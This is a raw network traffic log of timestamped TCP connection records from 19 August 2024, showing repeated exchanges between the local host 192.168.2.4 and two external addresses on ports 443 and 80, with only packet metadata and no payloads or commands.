Aug 19, 2024 06:06:04.298549891 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.298559904 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.298604012 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.299396038 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.299437046 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.299458027 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.299465895 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.299489021 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.299506903 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.309313059 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.309355974 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.309376955 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.309398890 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.309428930 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.309441090 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.330178022 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.330219030 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.330243111 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.330252886 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.330276966 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.330292940 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.346019030 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.346064091 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.346102953 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.346113920 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.346124887 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.346153975 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.360634089 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.360677958 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.360697031 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.360707045 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.360758066 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.360758066 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.361399889 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.361439943 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.361469030 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.361475945 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.361489058 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.361536980 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.374156952 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.374212027 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.374239922 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.374278069 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.374294996 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.374325991 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.387727976 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.387774944 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.387801886 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.387811899 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.387837887 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.387855053 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.388463974 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.388530016 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.388530970 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.388557911 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.388582945 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.388601065 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.398380041 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.398427963 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.398468971 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.398478031 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.398514032 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.398525000 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.401725054 CEST	49863	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:04.402169943 CEST	49864	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:04.406900883 CEST	80	49863	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:04.406959057 CEST	49863	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:04.406960011 CEST	80	49864	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:04.407035112 CEST	49864	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:04.407325983 CEST	49864	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:04.412122011 CEST	80	49864	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:04.419070005 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.419116020 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.419157028 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.419167042 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.419195890 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.419214964 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.434925079 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.434976101 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.435010910 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.435022116 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.435050964 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.435076952 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.661283970 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.661338091 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.661349058 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.661395073 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.661406994 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.661448956 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.661569118 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.661612034 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.661637068 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.661644936 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.661676884 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.661698103 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.661772966 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.661815882 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.661839962 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.661848068 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.661875010 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.661889076 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.661921978 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.661967039 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.661979914 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.661988974 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.662020922 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.662033081 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.667064905 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.667104959 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.667134047 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.667141914 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.667166948 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.667180061 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.667233944 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.667279005 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.667294025 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.667303085 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.667330980 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.667347908 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.667465925 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.667510033 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.667525053 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.667534113 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.667565107 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.667576075 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.668421984 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.668463945 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.668497086 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.668505907 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.668519020 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.668548107 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.669374943 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.669419050 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.669444084 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.669451952 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.669476032 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.669492960 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.670322895 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.670361996 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.670384884 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.670392990 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.670413971 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.670427084 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.672229052 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.672267914 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.672288895 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.672297001 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.672323942 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.672344923 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.673032045 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.673075914 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.673099041 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.673106909 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.673145056 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.673276901 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.673321009 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.673325062 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.673353910 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.673361063 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.673373938 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.673407078 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.674680948 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.674722910 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.674741030 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.674748898 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.674772978 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.674789906 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.676012039 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.676074028 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.676074982 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.676100016 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.676135063 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.676148891 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.676201105 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.676250935 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.676258087 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.676306009 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.676352024 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.676398993 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.676599979 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.676616907 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.703737974 CEST	49865	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.703768015 CEST	443	49865	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:04.703845024 CEST	49865	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.704124928 CEST	49865	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:04.704138994 CEST	443	49865	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:05.165461063 CEST	80	49864	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:05.166752100 CEST	49864	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:05.174052954 CEST	49864	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:05.174674034 CEST	49866	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:05.179052114 CEST	80	49864	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:05.179419994 CEST	80	49866	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:05.182797909 CEST	49864	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:05.182820082 CEST	49866	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:05.203308105 CEST	49866	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:05.208133936 CEST	80	49866	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:05.418375015 CEST	443	49865	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:05.418564081 CEST	49865	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:05.419373989 CEST	49865	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:05.419385910 CEST	443	49865	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:05.421972990 CEST	49865	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:05.421972990 CEST	49865	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:05.421983004 CEST	443	49865	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:05.421996117 CEST	443	49865	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:05.998055935 CEST	80	49866	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:05.998193979 CEST	49866	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:06.041927099 CEST	49867	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:06.041969061 CEST	443	49867	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:06.042735100 CEST	49867	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:06.046890020 CEST	49867	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:06.046900034 CEST	443	49867	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:06.137178898 CEST	49866	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:06.137473106 CEST	49868	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:06.142359018 CEST	80	49868	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:06.142577887 CEST	49868	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:06.142715931 CEST	49868	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:06.143048048 CEST	80	49866	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:06.143109083 CEST	49866	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:06.147444963 CEST	80	49868	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:06.177046061 CEST	443	49865	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:06.177119017 CEST	49865	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:06.177146912 CEST	443	49865	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:06.177206039 CEST	443	49865	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:06.177210093 CEST	49865	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:06.177251101 CEST	49865	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:06.229701042 CEST	49865	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:06.229722977 CEST	443	49865	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:06.708219051 CEST	443	49867	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:06.708282948 CEST	49867	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:06.709224939 CEST	49867	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:06.709232092 CEST	443	49867	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:06.712529898 CEST	49867	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:06.712536097 CEST	443	49867	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:06.712594986 CEST	49867	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:06.712599993 CEST	443	49867	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:06.894865036 CEST	80	49868	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:06.894922972 CEST	49868	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:06.899147034 CEST	49868	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:06.899661064 CEST	49869	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:06.904190063 CEST	80	49868	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:06.904335022 CEST	49868	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:06.904448032 CEST	80	49869	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:06.904509068 CEST	49869	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:06.904792070 CEST	49869	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:06.909563065 CEST	80	49869	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:07.043869019 CEST	49870	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:07.043910027 CEST	443	49870	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:07.043963909 CEST	49870	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:07.044374943 CEST	49870	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:07.044389009 CEST	443	49870	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:07.484941959 CEST	443	49867	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:07.485058069 CEST	49867	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:07.485075951 CEST	443	49867	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:07.485109091 CEST	443	49867	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:07.485150099 CEST	49867	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:07.485471010 CEST	49867	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:07.486516953 CEST	49867	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:07.486531973 CEST	443	49867	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:07.700699091 CEST	80	49869	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:07.700820923 CEST	49869	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:07.724581957 CEST	443	49870	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:07.724657059 CEST	49870	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:07.725404024 CEST	49870	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:07.725409985 CEST	443	49870	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:07.730777979 CEST	49870	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:07.730783939 CEST	443	49870	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:07.807295084 CEST	49869	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:07.807440996 CEST	49871	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:07.812541962 CEST	80	49869	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:07.812601089 CEST	80	49871	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:07.812623024 CEST	49869	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:07.814631939 CEST	49871	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:07.814739943 CEST	49871	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:07.819513083 CEST	80	49871	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:08.160182953 CEST	49872	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:08.160212994 CEST	443	49872	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:08.160270929 CEST	49872	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:08.160640955 CEST	49872	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:08.160654068 CEST	443	49872	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:08.562443018 CEST	443	49870	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:08.562510967 CEST	49870	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:08.562542915 CEST	443	49870	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:08.562589884 CEST	49870	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:08.562609911 CEST	443	49870	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:08.562654972 CEST	49870	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:08.567673922 CEST	49870	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:08.567691088 CEST	443	49870	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:08.570414066 CEST	80	49871	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:08.570461988 CEST	49871	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:08.575330973 CEST	49871	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:08.575608969 CEST	49873	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:08.580450058 CEST	80	49871	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:08.580461025 CEST	80	49873	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:08.580498934 CEST	49871	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:08.580543041 CEST	49873	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:08.581038952 CEST	49873	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:08.585823059 CEST	80	49873	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:08.808564901 CEST	443	49872	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:08.808641911 CEST	49872	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:08.946238995 CEST	49872	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:08.946258068 CEST	443	49872	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:08.948321104 CEST	49872	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:08.948337078 CEST	443	49872	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:09.344243050 CEST	80	49873	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:09.344548941 CEST	49873	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:09.464407921 CEST	49873	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:09.464409113 CEST	49874	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:09.469429016 CEST	80	49874	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:09.469532013 CEST	49874	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:09.469747066 CEST	80	49873	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:09.470076084 CEST	49874	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:09.470166922 CEST	49873	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:09.474879026 CEST	80	49874	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:09.491877079 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:09.491911888 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:09.492166042 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:09.492243052 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:09.492255926 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:09.744469881 CEST	443	49872	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:09.744595051 CEST	49872	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:09.744605064 CEST	443	49872	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:09.744642019 CEST	443	49872	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:09.744674921 CEST	49872	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:09.744769096 CEST	49872	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:09.745559931 CEST	49872	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:09.745579004 CEST	443	49872	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.134458065 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.134516001 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.135284901 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.135293007 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.137795925 CEST	49875	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:10.137809038 CEST	443	49875	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:10.239201069 CEST	80	49874	185.215.113.16	192.168.2.4
